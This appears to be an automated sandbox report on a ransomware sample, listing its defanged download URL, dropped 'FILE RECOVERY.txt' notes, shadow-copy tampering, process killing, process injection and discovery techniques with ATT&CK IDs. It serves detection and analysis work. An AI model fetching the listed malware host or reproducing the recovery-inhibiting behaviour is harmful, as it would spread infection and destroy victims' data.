hxxp://80[.]66[.]75[.]37/a-Xgjsx[.]exe

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

a-Xgjsx.exe

description	ioc	process
File opened (read-only)	\??\M:	a-Xgjsx.exe
File opened (read-only)	\??\O:	a-Xgjsx.exe
File opened (read-only)	\??\W:	a-Xgjsx.exe
File opened (read-only)	\??\E:	a-Xgjsx.exe
File opened (read-only)	\??\L:	a-Xgjsx.exe
File opened (read-only)	\??\V:	a-Xgjsx.exe
File opened (read-only)	\??\I:	a-Xgjsx.exe
File opened (read-only)	\??\J:	a-Xgjsx.exe
File opened (read-only)	\??\P:	a-Xgjsx.exe
File opened (read-only)	\??\R:	a-Xgjsx.exe
File opened (read-only)	\??\T:	a-Xgjsx.exe
File opened (read-only)	\??\A:	a-Xgjsx.exe
File opened (read-only)	\??\F:	a-Xgjsx.exe
File opened (read-only)	\??\H:	a-Xgjsx.exe
File opened (read-only)	\??\U:	a-Xgjsx.exe
File opened (read-only)	\??\X:	a-Xgjsx.exe
File opened (read-only)	\??\Z:	a-Xgjsx.exe
File opened (read-only)	\??\N:	a-Xgjsx.exe
File opened (read-only)	\??\Q:	a-Xgjsx.exe
File opened (read-only)	\??\S:	a-Xgjsx.exe
File opened (read-only)	\??\Y:	a-Xgjsx.exe
File opened (read-only)	\??\B:	a-Xgjsx.exe
File opened (read-only)	\??\G:	a-Xgjsx.exe
File opened (read-only)	\??\K:	a-Xgjsx.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

145 api.ipify.org
Drops file in System32 directory 1 IoCs

Processes:

mmc.exe

description ioc process

File opened for modification C:\Windows\system32\eventvwr.msc mmc.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

a-Xgjsx.exe

description pid process target process

PID 2124 set thread context of 2104 2124 a-Xgjsx.exe a-Xgjsx.exe

flow	ioc
145	api.ipify.org

description	ioc	process
File opened for modification	C:\Windows\system32\eventvwr.msc	mmc.exe

description	pid	process	target process
PID 2124 set thread context of 2104	2124	a-Xgjsx.exe	a-Xgjsx.exe

Drops file in Program Files directory 64 IoCs

Processes:

a-Xgjsx.exe

description	ioc	process
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\SplashScreen.scale-125.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\LargeTile.scale-125.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileWide.scale-100.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\dcGoalFly_D.wav	a-Xgjsx.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ul-oob.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ppd.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\precomplete	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp3.scale-125.png	a-Xgjsx.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cy\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar	a-Xgjsx.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ro\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-oob.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\tr\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ppd.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\redshift.ini	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.LEX	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-sl\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleLargeTile.scale-125.png	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\LICENSE	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul-oob.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\MediumBlue.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mn\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-125_contrast-white.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerLargeTile.scale-125.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\challenge\Came_To_Play_Unearned_small.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\common\Jack_Of_All_Trades_.png	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\PersonalMonthlyBudget.xltx	a-Xgjsx.exe

Drops file in Windows directory 2 IoCs

Processes:

taskmgr.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4196	sc.exe
3748	sc.exe
4204	sc.exe
4460	sc.exe
5792	sc.exe
5700	sc.exe
5484	sc.exe
508	sc.exe
3872	sc.exe
5988	sc.exe
4892	sc.exe
3280	sc.exe
4532	sc.exe
3244	sc.exe
4844	sc.exe
2536	sc.exe
5328	sc.exe
5768	sc.exe
2072	sc.exe
5132	sc.exe
2668	sc.exe
5540	sc.exe
4424	sc.exe
2820	sc.exe
3404	sc.exe
4892	sc.exe
3872	sc.exe
5400	sc.exe
5376	sc.exe
4444	sc.exe
6068	sc.exe
2204
2308	sc.exe
2840	sc.exe
3428	sc.exe
64	sc.exe
4216	sc.exe
5364	sc.exe
3508
2752
1316	sc.exe
260	sc.exe
4480	sc.exe
5512	sc.exe
2888	sc.exe
5420	sc.exe
2300	sc.exe
5232
5796
2460	sc.exe
3732	sc.exe
1040	sc.exe
5432	sc.exe
4496	sc.exe
4160	sc.exe
3732	sc.exe
4740	sc.exe
5844	sc.exe
3224	sc.exe
5724	sc.exe
4888	sc.exe
2664	sc.exe
1572	sc.exe
5968	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

3888 net.exe
5752 net.exe
Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1436 tasklist.exe
5852 tasklist.exe
1072 tasklist.exe
5504 tasklist.exe
3884 tasklist.exe
356 tasklist.exe

pid	process
3888	net.exe
5752	net.exe

pid	process
1436	tasklist.exe
5852	tasklist.exe
1072	tasklist.exe
5504	tasklist.exe
3884	tasklist.exe
356	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

5088 vssadmin.exe
4984 vssadmin.exe

pid	process
5088	vssadmin.exe
4984	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5352
5700
5748
5756	taskkill.exe
5604
2908
5448
2496
832
3556	taskkill.exe
3468
428
432	taskkill.exe
6008	taskkill.exe
4344
2484
1756
5796
5620
6032
5444
2720
4048
4496
6044
5220
668
4048
2972
6068
5628
5420
5720
1476	taskkill.exe
5364
4184
2016	taskkill.exe
5976
5544
5412
5572
4112
4780	taskkill.exe
760
4488
5192
4976
6016	taskkill.exe
4748	taskkill.exe
4336
2880
4240
3408
5060
5488
2552
2536
4892
1164	taskkill.exe
3768
5288
2156
4304
3500

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 43f289759c45d901	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80662728a161d901	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{505FC0A4-CD94-11ED-A853-6601CCCDB590} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "667838974"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "632826002"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000997a23a2ecd7164cbfc0800bd950d6620000000002000000000010660000000100002000000013f25c6dc6edf2125ae1b027847adfce6d4e8dac52be75a5bc655033081d9d5b000000000e8000000002000020000000eee8146bdcb7aced15f380f2cffb89d6a2899494a41e4dc9a5fd2b517de3ce2d20000000e764c3d80f427252feb3b996d18177b29ec511be932b2c46fb9d94375be48a574000000067d9f2a82a273bd3091d53a9d1d19766abab9c85d082a11e1e9773572a5ee9e0fb7975d54e2bacf0a9bf69dcaad2fd6382ac320ef24a4707344be864c1266495	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a00e1928a161d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{C65E84CA-5B36-4104-AE57-85823FE756E5}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000997a23a2ecd7164cbfc0800bd950d66200000000020000000000106600000001000020000000bc77212f6ca334995aa086a695ae7576dea12b41efee44bb22195fd3b2f74784000000000e8000000002000020000000c25b8f79b4ab0682963b58d07d6b525df8ac63cd8fe91052e08206f1bda3b83f200000001fc9e6af3af54ee24db4b15bd2843e8aeac6259be88e8645304b079706afc67a40000000451513483ee12fe127db7a57e0b36b36ec5aae9ae3c16427fd8e2cf9cad55462df92b5f1b94fb6770a524c2d9cb5790101e4b08e68acddb5a365779ec847463f	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "632826002"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31023521"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31023521"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31023521"	IEXPLORE.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133245008650958867"	chrome.exe

Modifies registry class 64 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000eeee93975945d9016cc98a2f6445d9016cc98a2f6445d90114000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	chrome.exe
